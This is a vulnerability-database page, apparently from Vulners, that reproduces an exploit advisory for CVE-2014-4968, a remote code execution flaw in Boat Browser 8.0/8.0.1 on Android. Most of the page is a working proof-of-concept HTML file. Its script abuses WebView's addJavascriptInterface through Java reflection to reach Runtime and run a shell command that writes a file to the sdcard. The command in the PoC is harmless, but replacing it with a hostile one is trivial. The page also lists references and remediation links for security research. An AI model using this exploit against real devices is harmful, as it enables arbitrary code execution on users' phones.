Vulners
Lucene search
Boat Browser 8.0 / 8.0.1 Remote Code Execution
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability | 17 Jul 201400:00 | – | zdt |
| Android 4.2 Browser and WebView - addJavascriptInterface Code Execution Exploit | 23 Mar 201700:00 | – | zdt |
 | JavaScript to Java | 21 Dec 201200:00 | – | android |
 | CVE-2012-6636 | 21 Dec 201200:00 | – | circl |
 | CVE-2012-6636 | 3 Mar 201402:00 | – | cve |
| CVE-2014-4968 | 12 Feb 202000:19 | – | cve |
 | CVE-2012-6636 | 3 Mar 201402:00 | – | cvelist |
| CVE-2014-4968 | 12 Feb 202000:19 | – | cvelist |
 | Boat Browser 8.0/8.0.1 - Remote Code Execution | 16 Jul 201400:00 | – | exploitdb |
 | EUVD-2014-4883 | 7 Oct 202500:30 | – | euvd |
10
`<!--
.:: Remote code execution vulnerability in Boat Browser ::.
credit: c0otlass
social contact: https://twitter.com/c0otlass
mail: [email protected]
CVE reserved : 2014-4968
time of discovery: July 14, 2014
Browser Official site:http://www.boatmob.com/
Browser download link:https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en
version Affected : In 8.0 and 8.0.1 tested , Android 3.0 through 4.1.x
Risk rate: High
vulnerability Description impact:
The WebView class and use of the WebView.addJavascriptInterface method has vulnerability which cause remote code in html page run in android device
a related issue to CVE-2012-6636
proof of concept:
//..............................................poc.hmtl............................................
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UFT-8">
<title>CreatMalTxt POC - WebView</title>
<script>
var obj;
function TestVulnerability()
{
temp="not";
var myObject = window;
for (var name in myObject) {
if (myObject.hasOwnProperty(name)) {
try
{
temp=myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null);
}
catch(e)
{
}
}
}
if(temp=="not")
{
document.getElementById("log").innerHTML="this browser has been patched";
}
else{
document.getElementById("log").innerHTML = "This browser is exploitabale" + "<br>" + " the poc file hase been created in sdcard ...<br>" ;
document.getElementById("log").innerHTML += "we could see proccess information"+ temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);
}
}
</script>
</head>
<body >
<h3>CreatMalTxt POC</h3>
<input value="Test Vulnerability" type="button" onclick="TestVulnerability();" />
<div id="log"></div>
</body>
</html>
<!--
Solution:
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
http://www.programering.com/a/MDM3YzMwATc.html
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
References:
http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/
https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
http://50.56.33.56/blog/?p=314
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py
-->
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jul 2014 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.76338